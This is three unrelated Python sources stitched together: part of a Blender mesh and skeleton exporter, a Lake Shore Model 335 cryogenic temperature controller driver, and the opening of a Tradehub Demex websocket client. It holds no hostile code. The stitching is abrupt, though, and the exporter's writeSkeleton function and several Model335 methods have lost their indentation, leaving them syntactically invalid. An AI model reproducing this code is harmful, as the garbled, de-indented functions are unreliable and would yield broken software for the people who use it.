        (boneIndex, weight) quadruples, and tris is the triangle index list.
    """
    def vec2key(v):
        # Round UVs so nearly-identical coordinates dedupe to the same key.
        return (round(v[0], 4), round(v[1], 4))
    # Return data
    vd = {}
    uvDicts = [{} for uvl in mesh.uv_layers] if settings.exportTextures else []
    animL = [[(0,0.0), (0,0.0), (0,0.0), (0,0.0)] for vertex in mesh.vertices] if settings.exportBoneWeights else []
    tris = []
    # Used as a key for vertex information (reused buffer; getVertexIndex copies it).
    index = [0] * ne
    # Loop through all the triangles
    ti = 0
    for polyIndex, poly in enumerate(mesh.polygons):
        for tri in getTris(poly.loop_indices):
            # Loop through triangle vertices
            inds = [0, 0, 0]
            for vti, vert in enumerate(tri):
                vi = mesh.loops[vert].vertex_index
                ii = 0
                # Position index
                index[ii] = vi
                ii += 1
                # Normal index: smooth faces share the vertex normal (key vi);
                # flat faces use the face normal, encoded as -(polyIndex + 1).
                if settings.exportNormals:
                    normIndex = vi if poly.use_smooth else -(polyIndex + 1)
                    index[ii] = normIndex
                    ii += 1
                # UV index (one slot per UV layer)
                if settings.exportTextures:
                    for i, uvl in enumerate(mesh.uv_layers):
                        uvk = vec2key(uvl.data[vert].uv)
                        index[ii] = getUnique(uvDicts[i], uvk)
                        ii += 1
                # Export tangent space for the first texture
                if settings.exportTangentSpace and (len(mesh.uv_layers) > 0):
                    index[ii] = ti  # TODO: Fix this (per-triangle key defeats dedup)
                    ii += 1
                # Animation index
                if settings.exportBoneWeights:
                    # Bone information is unique to the vertex
                    index[ii] = vi
                    ii += 1
                    index[ii] = vi
                    ii += 1
                inds[vti] = getVertexIndex(vd, index)
            # Add a triangle
            tris.append(tuple(inds))
            ti += 1
    # Compute bone weight information here
    if settings.exportBoneWeights:
        object = context.object
        # Assumes exactly one other selected object, and that it is the armature —
        # TODO(review): confirm selection contract with callers.
        armature = [obj for obj in context.selected_objects if obj != object][0]
        for vertex in mesh.vertices:
            for group in vertex.groups:
                if group.weight > 0:
                    weight = object.vertex_groups[group.group].weight(vertex.index) * group.weight
                    # Match the vertex group name to a bone index in the armature.
                    boneIndex = [i for i, bone in enumerate(armature.data.bones) if bone.name == object.vertex_groups[group.group].name][0]
                    print('%s - %d' % (object.vertex_groups[group.group].name, boneIndex))
                    animL[vertex.index] = insertWeighting(animL[vertex.index], (boneIndex, weight))
                    # Normalize weights (re-done after each insertion so the quadruple sums to 1)
                    normFactor = animL[vertex.index][0][1] + animL[vertex.index][1][1] + animL[vertex.index][2][1] + animL[vertex.index][3][1]
                    for i in [0,1,2,3]:
                        animL[vertex.index][i] = (animL[vertex.index][i][0], animL[vertex.index][i][1] / normFactor)
    # Convert to list form
    vl = [None] * len(vd)
    uvl = [[None] * len(uvd) for uvd in uvDicts]
    for key, val in vd.items():
        vl[val] = key
    for i, uvd in enumerate(uvDicts):
        for key, val in uvd.items():
            uvl[i][val] = key
    return (vl, uvl, animL, tris)
def writeMesh(context, filepath, settings):
    """Export the active object's mesh to `filepath`.

    Writes the binary 'VRAW' format, or a YAML text dump (path gets '.yml'
    appended) when settings.exportBinary is False.

    Args:
        context: Blender context; context.object must hold the mesh to export.
        filepath: destination file path.
        settings: MeshExportSettings selecting attributes and output format.

    Returns:
        {'FINISHED'} so this can back a Blender operator's execute().
    """
    # Grab mesh for export
    mesh = context.object.data
    # Get vertex element information
    vertexElements, vertexSize = getVertexElementsAndSize(mesh, settings)
    # Get mesh data
    vList, uvLists, animL, tris = getAllUniqueVertexIndices(context, mesh, len(vertexElements), settings)
    if settings.exportBinary:
        # 'with' guarantees the handle is closed even if packing/writing raises
        # (the previous open/close pair leaked the handle on exceptions).
        with open(filepath, 'wb') as f:
            # Write header
            f.write(struct.pack('<4s', bytes('VRAW', 'utf-8')))
            # Write vertex elements
            f.write(struct.pack('<I', len(vertexElements)))
            for element in vertexElements:
                f.write(struct.pack('<HBBBB',
                    element.offset,
                    element.componentSize,
                    element.componentCount,
                    # Usage index in the high nibble, usage type in the low nibble.
                    (element.index << 4) | element.usage.value,
                    element.flags.value
                ))
            # Write index size (4-byte triangle indices)
            f.write(struct.pack('<I', 4))
            # Write vertex data
            f.write(struct.pack('<I', len(vList)))
            for vertKey in vList:
                for i, ve in enumerate(vertexElements):
                    if ve.usage == VertexAttributeUsage.POSITION:
                        pos = mesh.vertices[vertKey[i]].co
                        f.write(struct.pack('<fff', pos[0], pos[1], pos[2]))
                    elif ve.usage == VertexAttributeUsage.NORMAL:
                        # Negative keys encode flat-shaded faces as -(polyIndex + 1).
                        ni = vertKey[i]
                        normal = mesh.vertices[ni].normal if ni >= 0 else mesh.polygons[-ni - 1].normal
                        f.write(struct.pack('<fff', normal[0], normal[1], normal[2]))
                    elif ve.usage == VertexAttributeUsage.TEXTURE_COORDINATE:
                        uv = uvLists[ve.index][vertKey[i]]
                        f.write(struct.pack('<ff', uv[0], uv[1]))
                    elif ve.usage == VertexAttributeUsage.BONE_WEIGHTS:
                        weights = animL[vertKey[i]]
                        f.write(struct.pack('<ffff', weights[0][1], weights[1][1], weights[2][1], weights[3][1]))
                    elif ve.usage == VertexAttributeUsage.BONE_INDICES:
                        weights = animL[vertKey[i]]
                        f.write(struct.pack('<HHHH', weights[0][0], weights[1][0], weights[2][0], weights[3][0]))
            # Write index data
            f.write(struct.pack('<I', len(tris) * 3))
            for tri in tris:
                f.write(struct.pack('<III', tri[0], tri[1], tri[2]))
    else:
        # Open the file in text mode with added YAML extension
        with open(filepath + '.yml', 'w', encoding='utf-8') as f:
            # Write vertex elements
            f.write("VertexElements:\n")
            for element in vertexElements:
                f.write(' - Offset: %d\n' % (element.offset))
                f.write('   CompSize: %d\n' % (element.componentSize))
                f.write('   CompCount: %d\n' % (element.componentCount))
                f.write('   UsageType: %s\n' % (element.usage.name))
                f.write('   UsageIndex: %d\n' % (element.index))
                f.write('   Flags: %d\n' % (element.flags.value))
            # Write vertex data
            f.write("Vertices:\n")
            for vertKey in vList:
                for i, ve in enumerate(vertexElements):
                    # First element starts a YAML list item; the rest are continuations.
                    f.write(' - ' if i == 0 else '   ')
                    if ve.usage == VertexAttributeUsage.POSITION:
                        pos = mesh.vertices[vertKey[i]].co
                        f.write('Position%d: [%f,%f,%f]\n' % (ve.index, pos[0], pos[1], pos[2]))
                    elif ve.usage == VertexAttributeUsage.NORMAL:
                        ni = vertKey[i]
                        normal = mesh.vertices[ni].normal if ni >= 0 else mesh.polygons[-ni - 1].normal
                        f.write('Normal%d: [%f,%f,%f]\n' % (ve.index, normal[0], normal[1], normal[2]))
                    elif ve.usage == VertexAttributeUsage.TEXTURE_COORDINATE:
                        uv = uvLists[ve.index][vertKey[i]]
                        f.write('TexCoord%d: [%f,%f]\n' % (ve.index, uv[0], uv[1]))
                    elif ve.usage == VertexAttributeUsage.BONE_WEIGHTS:
                        weights = animL[vertKey[i]]
                        f.write('BWeights%d: [%f,%f,%f,%f]\n' % (ve.index, weights[0][1], weights[1][1], weights[2][1], weights[3][1]))
                    elif ve.usage == VertexAttributeUsage.BONE_INDICES:
                        weights = animL[vertKey[i]]
                        f.write('BIndices%d: [%d,%d,%d,%d]\n' % (ve.index, weights[0][0], weights[1][0], weights[2][0], weights[3][0]))
            # Write index data
            f.write("Triangles:\n")
            for tri in tris:
                f.write(' - [%d,%d,%d]\n' % (tri[0], tri[1], tri[2]))
    return {'FINISHED'}
def getKeyframes(context, object):
    """Collect, per bone, the frame numbers holding keyframes for that bone.

    Works by selecting one bone at a time and walking the timeline with the
    keyframe_jump operator, which honors the bone selection.

    NOTE(review): relies on UI operators (screen.frame_jump / keyframe_jump) and on
    `context.scene.update()`, a pre-2.8 Blender API — confirm the target version.
    """
    # Deselect all bones so keyframe_jump only sees one selected bone at a time.
    for bone in object.data.bones:
        bone.select = False
    keyframes = [[] for bone in object.data.bones]
    for i, bone in enumerate(object.data.bones):
        bone.select = True
        # Jump to the start of the timeline and record the first frame.
        bpy.ops.screen.frame_jump(0)
        context.scene.update()
        context.scene.frame_set(context.scene.frame_current)
        keyframes[i].append(context.scene.frame_current)
        # Keep jumping forward until the operator reports no further keyframe.
        while {'FINISHED'} == bpy.ops.screen.keyframe_jump():
            context.scene.update()
            context.scene.frame_set(context.scene.frame_current)
            keyframes[i].append(context.scene.frame_current)
        bone.select = False
    return keyframes
def writeSkeleton(context, filepath, exportBinary):
# Get the armature
object = bpy.context.object
# TODO: Make sure we're not in POSE mode
if object.mode != 'POSE':
bpy.ops.object.posemode_toggle()
# Obtain the keyframes
keyframes = getKeyframes(context, object)
if exportBinary:
# Open the file in binary mode
f = open(filepath, 'wb')
# Write header
f.write(b'ANIM')
# Write all the bones
f.write(struct.pack('<I', len(object.pose.bones)))
for boneIndex, bone in enumerate(object.pose.bones):
# Write bone name and parent
f.write(struct.pack('<I', len(bone.name)))
f.write(bytes(bone.name, 'ASCII'))
if bone.parent:
f.write(struct.pack('<I', len(bone.parent.name)))
f.write(bytes(bone.parent.name, 'ASCII'))
else:
f.write(struct.pack('<I', 0))
# Write bone rest pose
object.data.pose_position = 'REST'
context.scene.update()
rotation = bone.matrix.to_quaternion()
f.write(struct.pack('<ffff', rotation[1], rotation[2], rotation[3], rotation[0]))
matrix = bone.matrix
f.write(struct.pack('<fff', matrix[0][3], matrix[1][3], matrix[2][3]))
object.data.pose_position = 'POSE'
context.scene.update()
# Write all keyframes for the bone
f.write(struct.pack('<I', len(keyframes[boneIndex])))
for frame in keyframes[boneIndex]:
# Move to animation frame
bpy.context.scene.frame_set(frame)
bpy.context.scene.update()
# Write frame and pose matrix
f.write(struct.pack('<i', frame))
rotation = bone.matrix.to_quaternion()
f.write(struct.pack('<ffff', rotation[1], rotation[2], rotation[3], rotation[0])) | |
"""Implements functionality unique to the Lake Shore Model 335 cryogenic temperature controller"""
from enum import IntEnum
from .temperature_controllers import TemperatureController, InstrumentException
from .temperature_controllers import RelayControlMode, RelayControlAlarm, InterfaceMode, HeaterError, \
CurveFormat, CurveTemperatureCoefficient, BrightnessLevel, AutotuneMode, HeaterResistance, Polarity, \
DiodeCurrent, HeaterOutputUnits, InputSensorUnits, ControlTypes, StandardEventRegister, OperationEvent, RegisterBase
# Re-export the shared temperature-controller enums/registers under Model335-prefixed
# names, so users of this module see one consistent, model-specific namespace.
Model335RelayControlMode = RelayControlMode
Model335RelayControlAlarm = RelayControlAlarm
Model335InterfaceMode = InterfaceMode
Model335HeaterError = HeaterError
Model335CurveFormat = CurveFormat
Model335CurveTemperatureCoefficient = CurveTemperatureCoefficient
Model335BrightnessLevel = BrightnessLevel
Model335AutoTuneMode = AutotuneMode
Model335HeaterResistance = HeaterResistance
Model335Polarity = Polarity
Model335DiodeCurrent = DiodeCurrent
Model335HeaterOutputUnits = HeaterOutputUnits
Model335InputSensorUnits = InputSensorUnits
Model335ControlTypes = ControlTypes
Model335StandardEventRegister = StandardEventRegister
Model335OperationEvent = OperationEvent
# Integer values below are the codes used verbatim in instrument command strings.
class Model335InputSensor(IntEnum):
    """Enumeration when "NONE" is an option for sensor input"""
    NONE = 0
    CHANNEL_A = 1
    CHANNEL_B = 2
class Model335MonitorOutUnits(IntEnum):
    """Units associated with a sensor channel"""
    KELVIN = 1
    CELSIUS = 2
    SENSOR = 3
class Model335InputSensorType(IntEnum):
    """Sensor type enumeration"""
    DISABLED = 0
    DIODE = 1
    PLATINUM_RTD = 2
    NTC_RTD = 3
    THERMOCOUPLE = 4
class Model335DiodeRange(IntEnum):
    """Diode voltage range enumeration"""
    TWO_POINT_FIVE_VOLTS = 0
    TEN_VOLTS = 1
class Model335RTDRange(IntEnum):
    """RTD resistance range enumeration"""
    TEN_OHM = 0
    THIRTY_OHM = 1
    HUNDRED_OHM = 2
    THREE_HUNDRED_OHM = 3
    ONE_THOUSAND_OHM = 4
    THREE_THOUSAND_OHM = 5
    TEN_THOUSAND_OHM = 6
    THIRTY_THOUSAND_OHM = 7
    ONE_HUNDRED_THOUSAND_OHM = 8
class Model335ThermocoupleRange(IntEnum):
    """Thermocouple range enumeration"""
    FIFTY_MILLIVOLT = 0
class Model335InputSensorSettings:
    """Parameter object consumed by the get/set_input_sensor methods."""
    def __init__(self, sensor_type, autorange_enable, compensation, units, input_range=None):
        """Capture one input sensor configuration.

        Args:
            sensor_type (Model335InputSensorType):
                * Specifies input sensor type
            autorange_enable (bool):
                * Specifies autoranging (False = off, True = on)
            compensation (bool):
                * Specifies input compensation (False = off, True = on)
            units (Model335InputSensorUnits):
                * Preferred units for sensor readings and the control setpoint
            input_range (IntEnum):
                * Input range, required only when autorange_enable is False
                * One of: Model335DiodeRange, Model335RTDRange, Model335ThermocoupleRange
        """
        self.units = units
        self.sensor_type = sensor_type
        self.compensation = compensation
        self.autorange_enable = autorange_enable
        # May stay None when autoranging handles range selection.
        self.input_range = input_range
# Heater-output related codes; values are sent verbatim in instrument commands.
class Model335HeaterOutType(IntEnum):
    """Heater output 2 enumeration"""
    CURRENT = 0
    VOLTAGE = 1
class Model335HeaterOutputDisplay(IntEnum):
    """Heater output display units enumeration"""
    CURRENT = 1
    POWER = 2
class Model335HeaterOutputMode(IntEnum):
    """Control loop enumeration"""
    OFF = 0
    CLOSED_LOOP = 1
    ZONE = 2
    OPEN_LOOP = 3
    MONITOR_OUT = 4
    WARMUP_SUPPLY = 5
class Model335WarmupControl(IntEnum):
    """Heater output 2 voltage mode warmup enumerations"""
    AUTO_OFF = 0
    CONTINUOUS = 1
class Model335HeaterRange(IntEnum):
    """Control loop heater range enumeration"""
    OFF = 0
    LOW = 1
    MEDIUM = 2
    HIGH = 3
class Model335ControlLoopZoneSettings:
    """Control loop configuration for a particular heater output and zone."""
    def __init__(self, upper_bound, proportional, integral, derivative, manual_output_value,
                 heater_range, channel, ramp_rate):
        """Capture one zone's control-loop configuration.

        Args:
            upper_bound (float):
                * Upper setpoint boundary of this zone in kelvin
            proportional (float):
                * Proportional gain for this zone (0.1 to 1000)
            integral (float):
                * Integral gain for this zone (0.1 to 1000)
            derivative (float):
                * Derivative gain for this zone (0 to 200 %)
            manual_output_value (float):
                * Manual output for this zone (0 to 100 %)
            heater_range (Model335HeaterRange):
                * Heater range for this zone
            channel (Model335InputSensor):
                * Sensor input driving this zone
            ramp_rate (float):
                * Ramp rate for this zone (0 - 100 K/min)
        """
        self.channel = channel
        self.ramp_rate = ramp_rate
        self.upper_bound = upper_bound
        self.heater_range = heater_range
        # PID terms
        self.proportional = proportional
        self.integral = integral
        self.derivative = derivative
        self.manual_output_value = manual_output_value
# Front-panel display codes; values are sent verbatim in instrument commands.
class Model335DisplaySetup(IntEnum):
    """Panel display setup enumeration"""
    INPUT_A = 0
    INPUT_A_MAX_MIN = 1
    TWO_INPUT_A = 2
    INPUT_B = 3
    INPUT_B_MAX_MIN = 4
    TWO_INPUT_B = 5
    CUSTOM = 6
    TWO_LOOP = 7
class Model335HeaterVoltageRange(IntEnum):
    """Voltage mode heater enumerations"""
    VOLTAGE_OFF = 0
    VOLTAGE_ON = 1
class Model335DisplayInputChannel(IntEnum):
    """Panel display information enumeration"""
    NONE = 0
    INPUT_A = 1
    INPUT_B = 2
    SETPOINT_1 = 3
    SETPOINT_2 = 4
    OUTPUT_1 = 5
    OUTPUT_2 = 6
class Model335DisplayFieldUnits(IntEnum):
    """Panel display units enumeration"""
    KELVIN = 1
    CELSIUS = 2
    SENSOR_UNITS = 3
    MINIMUM_DATA = 4
    MAXIMUM_DATA = 5
    SENSOR_NAME = 6
# Register classes: bit_names lists bits LSB to MSB; empty strings mark unused bits.
class Model335StatusByteRegister(RegisterBase):
    """Class object representing the status byte register LSB to MSB"""
    bit_names = [
        "",
        "",
        "",
        "",
        "message_available_summary_bit",
        "event_status_summary_bit",
        "service_request",
        "operation_summary_bit"
    ]
    def __init__(self,
                 message_available_summary_bit,
                 event_status_summary_bit,
                 service_request,
                 operation_summary_bit):
        self.message_available_summary_bit = message_available_summary_bit
        self.event_status_summary_bit = event_status_summary_bit
        self.service_request = service_request
        self.operation_summary_bit = operation_summary_bit
class Model335ServiceRequestEnable(RegisterBase):
    """Class object representing the service request enable register LSB to MSB"""
    bit_names = [
        "",
        "",
        "",
        "",
        "message_available_summary_bit",
        "event_status_summary_bit",
        "",
        "operation_summary_bit"
    ]
    def __init__(self,
                 message_available_summary_bit,
                 event_status_summary_bit,
                 operation_summary_bit):
        self.message_available_summary_bit = message_available_summary_bit
        self.event_status_summary_bit = event_status_summary_bit
        self.operation_summary_bit = operation_summary_bit
class Model335InputReadingStatus(RegisterBase):
    """Class object representing the input status flag bits"""
    bit_names = [
        "invalid_reading",
        "",
        "",
        "",
        "temp_underrange",
        "temp_overrange",
        "sensor_units_zero",
        "sensor_units_overrange"
    ]
    def __init__(self, invalid_reading, temp_underrange, temp_overrange, sensor_units_zero, sensor_units_overrange):
        self.invalid_reading = invalid_reading
        self.temp_underrange = temp_underrange
        self.temp_overrange = temp_overrange
        self.sensor_units_zero = sensor_units_zero
        self.sensor_units_overrange = sensor_units_overrange
class Model335(TemperatureController):
    """A class object representing the Lake Shore Model 335 cryogenic temperature controller"""
    # Initiate enum types for temperature controllers
    _input_channel_enum = Model335DisplayInputChannel
    _display_units_enum = Model335DisplayFieldUnits
    # Initiate instrument specific registers
    _status_byte_register = Model335StatusByteRegister
    _service_request_enable = Model335ServiceRequestEnable
    # USB vendor/product ID pairs used for device discovery.
    vid_pid = [(0x1FB9, 0x0300)]
    def __init__(self,
                 baud_rate,
                 serial_number=None,
                 com_port=None,
                 timeout=2.0,
                 ip_address=None,
                 tcp_port=None,
                 **kwargs):
        """Connect to a Model 335 over serial/USB or TCP; baud_rate is required here
        even though the parent constructor takes serial_number first."""
        # Call the parent init, then fill in values specific to the 335
        TemperatureController.__init__(self, serial_number, com_port, baud_rate, timeout, ip_address,
                                       tcp_port, **kwargs)
        # Disable emulation mode
        self._disable_emulation()
# Alias specific temperature controller methods
get_analog_output_percentage = TemperatureController._get_analog_output_percentage
set_autotune = TemperatureController._set_autotune
set_brightness = TemperatureController._set_brightness
get_brightness = TemperatureController._get_brightness
get_operation_condition = TemperatureController._get_operation_condition
get_operation_event_enable = TemperatureController._get_operation_event_enable
set_operation_event_enable = TemperatureController._set_operation_event_enable
get_operation_event = TemperatureController._get_operation_event
get_thermocouple_junction_temp = TemperatureController._get_thermocouple_junction_temp
set_soft_cal_curve_dt_470 = TemperatureController._set_soft_cal_curve_dt_470
set_soft_cal_curve_pt_100 = TemperatureController._set_soft_cal_curve_pt_100
set_soft_cal_curve_pt_1000 = TemperatureController._set_soft_cal_curve_pt_1000
set_diode_excitation_current = TemperatureController._set_diode_excitation_current
get_diode_excitation_current = TemperatureController._get_diode_excitation_current
get_tuning_control_status = TemperatureController._get_tuning_control_status
set_filter = TemperatureController._set_filter
get_filter = TemperatureController._get_filter
def set_monitor_output_heater(self, channel, high_value, low_value, units=Model335MonitorOutUnits.KELVIN,
polarity=Model335Polarity.UNIPOLAR):
"""Configures output 2. Use the set_heater_output_mode command to set the output mode to Monitor Out.
Args:
channel (Model335InputSensor):
* Specifies which sensor input to monitor
high_value (float):
* Represents the data at which the Monitor Out reaches +100% output
* Entered in the units designated by the <units> argument
low_value (float):
* Represents the data at which the analog output reaches -100% output if bipolar,
* or 0% outputif unipolar. Entered in the units designated by the <units> argument
units (Model335MonitorOutUnits):
* Specifies the units on which to base the output voltage
polarity (Model335Polarity):
* Specifies output voltage is unipolar or bipolar
"""
self.command("ANALOG 2,{},{},{},{},{}".format(channel, units, high_value, low_value, polarity))
    def get_monitor_output_heater(self):
        """Used to obtain all monitor out parameters for output 2.
        Return:
            (dict):
                * See set_monitor_output_heater method arguments
                * Keys:
                    * "channel": Model335InputSensor
                    * "units": Model335MonitorOutUnits
                    * "high_value": float
                    * "low_value": float
                    * "polarity": Model335Polarity
        """
        # Response is a comma-separated list in the same order as the ANALOG command.
        parameters = self.query("ANALOG? 2").split(",")
        return {"channel": Model335InputSensor(int(parameters[0])),
                "units": Model335MonitorOutUnits(int(parameters[1])),
                "high_value": float(parameters[2]),
                "low_value": float(parameters[3]),
                "polarity": Model335Polarity(int(parameters[4]))}
def get_celsius_reading(self, channel):
"""Returns the temperature value in celsius of either channel.
Args:
channel (str):
* Selects the sensor input to query
* "A" or "B"
"""
return float(self.query("CRDG? {}".format(channel)))
def set_display_setup(self, mode):
"""Sets the display mode
Args:
mode (Model335DisplaySetup):
* Specifies the front panel display mode
* See Model335DisplaySetup IntEnum class
"""
self.command("DISPLAY {}".format(mode))
def get_display_setup(self):
"""Returns the display mode
Return:
(Model335DisplaySetup):
* Specifies the front panel display mode
* See Model335DisplaySetup IntEnum class
"""
return Model335DisplaySetup(int(self.query("DISPLAY?")))
    def set_heater_setup_one(self, heater_resistance, max_current, output_display_mode):
        """Method to configure heater output one (always a current-mode output).
        Args:
            heater_resistance (Model335HeaterResistance):
                * See Model335HeaterResistance IntEnum class
            max_current (float):
                * Specifies the maximum current for the heater
            output_display_mode (Model335HeaterOutputDisplay):
                * Specifies how the heater output is displayed
                * See Model335HeaterOutputDisplay IntEnum class
        """
        # The two zero fields are fixed positional parameters of the HTRSET command.
        self.command("HTRSET 1,0,{},0,{},{}".format(heater_resistance, max_current, output_display_mode))
def set_heater_setup_two(self, output_type, heater_resistance, max_current, display_mode):
"""Method to configure the heater output 2.
Args:
output_type (Model335HeaterOutType):
* Specifies wheter the heater output is in constant current or voltage mode
* See Model335HeaterOutType IntEnum class
heater_resistance (Model335HeaterResistance):
* See Model335HeaterResistance IntEnum class
max_current (float):
* Specifies the maximum current for the heater
display_mode (Model335HeaterOutType):
* Specifies how the heater output is displayed
* Required only if output_type is set to CURRENT
* See Model335HeaterOutType IntEnum class
"""
self.command("HTRSET 2,{},{},0,{},{}".format(output_type, heater_resistance, max_current, display_mode))
def get_heater_setup(self, heater_output):
"""Returns the heater configuration status.
Args:
heater_output (int)
* Selects which heater output to query
Return:
(dict):
* See set_heater_setup_one/set_heater_setup_two method arguments
* Keys:
* "output_type": Model335HeaterOutType
* "heater_resistance": Model335HeaterResistance
* "max_current": float
* "output_display_mode": Model335HeaterOutputDisplay
"""
heater_setup = self.query("HTRSET? {}".format(heater_output)).split(",")
| |
<reponame>Mai-Te-Pora/tradehub-python
from typing import Optional, List, Callable
import websockets
import json
class DemexWebsocket:
"""
DemexWebsocket is a high-level async implementation off the official Tradehub Demex websocket and provides all
functionalities described in the documentation.
"""
    def __init__(self, uri: str, ping_interval: Optional[int] = 10, ping_timeout: Optional[int] = 30):
        """
        Create a websocket client compliant with the specification provided by the official documentation.

        .. see::
            https://docs.switcheo.org/#/?id=websocket

        :param uri: Websocket URI, starting with 'ws://' or 'wss://' e.g. 'ws://192.168.127.12:5000/ws'
        :param ping_interval: Interval for pinging the server in seconds.
        :param ping_timeout: Time after no response for pings are considered as timeout in seconds.
        """
        # Connection parameters are stored only; the actual websocket is
        # opened later (self._websocket stays None until then).
        self._uri: str = uri
        self._ping_interval: int = ping_interval
        self._ping_timeout: int = ping_timeout
        self._websocket: Optional[websockets.WebSocketClientProtocol] = None
async def subscribe(self, message_id: str, channels: List[str]):
"""
Subscribe to one or many channels.
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param channels: List with channels to join.
:return: None
"""
await self.send({
"id": message_id,
"method": "subscribe",
"params": {"channels": channels}
})
async def unsubscribe(self, message_id: str, channels: List[str]):
"""
Unsubscribe to one or many channels.
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param channels: List with channels to leave.
:return: None
"""
await self.send({
"id": message_id,
"method": "unsubscribe",
"params": {"channels": channels}
})
async def subscribe_leverages(self, message_id: str, swth_address: str):
"""
Subscribe to wallet specific leverages channel.
.. warning::
This channel has not been tested yet.
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet.
:return: None
"""
# TODO not tested yet
channel_name: str = f"leverages.{swth_address}"
await self.subscribe(message_id, [channel_name])
async def subscribe_market_stats(self, message_id: str):
"""
Subscribe to market stats.
Example::
ws_client.subscribe_market_stats('market_stats')
The initial channel message is expected as::
{
'id':'market_stats',
'result': ['market_stats']
}
The subscription and channel messages are expected as follow::
{
'channel': 'market_stats',
'sequence_number': 484,
'result': {
'cel1_usdc1': {
'day_high': '5.97',
'day_low': '5.72',
'day_open': '5.86',
'day_close': '5.74',
'day_volume': '414.4',
'day_quote_volume': '2429.009',
'index_price': '0',
'mark_price': '0',
'last_price': '5.74',
'market': 'cel1_usdc1',
'market_type': 'spot',
'open_interest': '0'
}
...
}
}
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:return: None
"""
channel_name: str = "market_stats"
await self.subscribe(message_id, [channel_name])
async def subscribe_books(self, message_id: str, market: str):
"""
Subscribe to book channel.
Example::
ws_client.subscribe_books('orderbook', "swth_eth1')
The initial channel message is expected as::
{
'id':'orderbook',
'result': ['books.eth1_usdc1', ...]
}
The initial subscription message is expected as::
{
'channel': 'books.eth1_usdc1',
'sequence_number': 924,
'result': [
{
'market': 'eth1_usdc1',
'price': '1797.1',
'quantity': '0.02',
'side': 'sell',
'type': 'new'
},
...
{
'market': 'eth1_usdc1',
'price': '1790.1',
'quantity': '0.02',
'side': 'buy',
'type': 'new'
}
...
]
}
The channel update messages are expected as::
{
'channel': 'books.eth1_usdc1',
'sequence_number': 924,
'result': [
{
'market': 'eth1_usdc1',
'price': '1797.1',
'quantity': '0',
'side': 'sell',
'type': 'delete'
},
...
{
'market':'eth1_usdc1',
'price': '1800.18',
'quantity': '-0.43',
'side': 'sell',
'type': 'update'
},
...
{
'market': 'eth1_usdc1',
'price': '1114.48',
'quantity': '182.716',
'side': 'buy',
'type': 'new'
}
]
}
.. note::
The initial message is a snapshot of the current orderbook. The following messages are delta messages to the
snapshot. Each message has a 'sequence_number'.
Updates can contain update types: 'new', 'update' or 'delete'. The quantity in a 'update' message can be
negative indicating a reduction, while positive value means an increment.
All updates need to be processed in the provided order to maintain an consistent orderbook.
.. warning::
The initial snapshot is a partial orderbook with a total of 100 entries!
Expect receiving updates for orders outside the local managed orderbook.
Ignore or reconnect to maintain the local orderbook.
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param market: Tradehub market identifier, e.g. 'swth_eth1'
:return: None
"""
channel_name: str = f"books.{market}"
await self.subscribe(message_id, [channel_name])
async def subscribe_orders(self, message_id: str, swth_address: str, market: Optional[str] = None):
"""
Subscribe to orders channel.
.. note::
The market identifier is optional and acts as a filter.
Example::
ws_client.subscribe_orders('orders', "swth1...abcd')
The initial channel message is expected as::
{
'id':'orders',
'result': ['orders.swth1...abcd']
}
The channel update messages are expected as::
{
'channel': 'orders.swth1...abcd',
'result': [
{
'order_id': '7CBBF51B75CF2E046726BB...56757D6D502B01F4BB62178DCF',
'block_height': 7375724,
'triggered_block_height': 0,
'address': 'swth1...abcd',
'market': 'eth1_wbtc1',
'side': 'sell',
'price': '0',
'quantity': '0.08',
'available': '0.08',
'filled': '0',
'order_status': 'pending',
'order_type': 'market',
'initiator': 'user',
'time_in_force': 'fok',
'stop_price': '0',
'trigger_type': '',
'allocated_margin_denom': 'eth1',
'allocated_margin_amount': '0',
'is_liquidation': False,
'is_post_only': False,
'is_reduce_only': False,
'type': 'new',
'block_created_at': '2021-02-11T20:36:02.244175356Z',
'username': '',
'id': ''
}
...
]
}
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet.
:param market: Tradehub market identifier, e.g. 'swth_eth1'
:return: None
"""
if market:
channel_name: str = f"orders_by_market.{market}.{swth_address}"
else:
channel_name: str = f"orders.{swth_address}"
await self.subscribe(message_id, [channel_name])
async def subscribe_positions(self, message_id: str, swth_address: str, market: Optional[str] = None):
"""
Subscribe to positions channel.
.. note::
The market identifier is optional and acts as a filter.
.. warning::
This channel is not tested yet.
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet.
:param market: Tradehub market identifier, e.g. 'swth_eth1'
:return: None
"""
# TODO not tested yet
if market:
channel_name: str = f"positions_by_market.{market}.{swth_address}"
else:
channel_name: str = f"positions.{swth_address}"
await self.subscribe(message_id, [channel_name])
async def subscribe_recent_trades(self, message_id: str, market: str):
"""
Subscribe to recent trades.
Example::
ws_client.subscribe_recent_trades('trades', "swth_eth1')
The initial channel message is expected as::
{
'id': 'trades',
'result': ['recent_trades.swth_eth1']
}
The channel update messages are expected as::
{
'channel': 'recent_trades.eth1_usdc1',
'sequence_number': 812,
'result': [
{
'id': '0',
'block_created_at': '2021-02-11T20:49:07.095418551Z',
'taker_id': '5FF349410F9CF59BED36D412D1223424835342274BC0E504ED0A17EE4B5B0856',
'taker_address': 'swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p',
'taker_fee_amount': '0.00002',
'taker_fee_denom': 'eth1',
'taker_side': 'buy',
'maker_id': '8334A9C97CAEFAF84774AAADB0D5666E7764BA023DF145C8AF90BB6A6862EA2E',
'maker_address': 'swth1wmcj8gmz4tszy5v8c0d9lxnmguqcdkw22275w5',
'maker_fee_amount': '-0.00001',
'maker_fee_denom': 'eth1',
'maker_side': 'sell',
'market': 'eth1_usdc1',
'price': '1797.1',
'quantity': '0.02',
'liquidation': '',
'taker_username': '',
'maker_username': '',
'block_height': '7376096'
},
...
]
}
.. warning::
The field 'id' is sometimes '0'. This endpoint/channel does not seem to work correct.
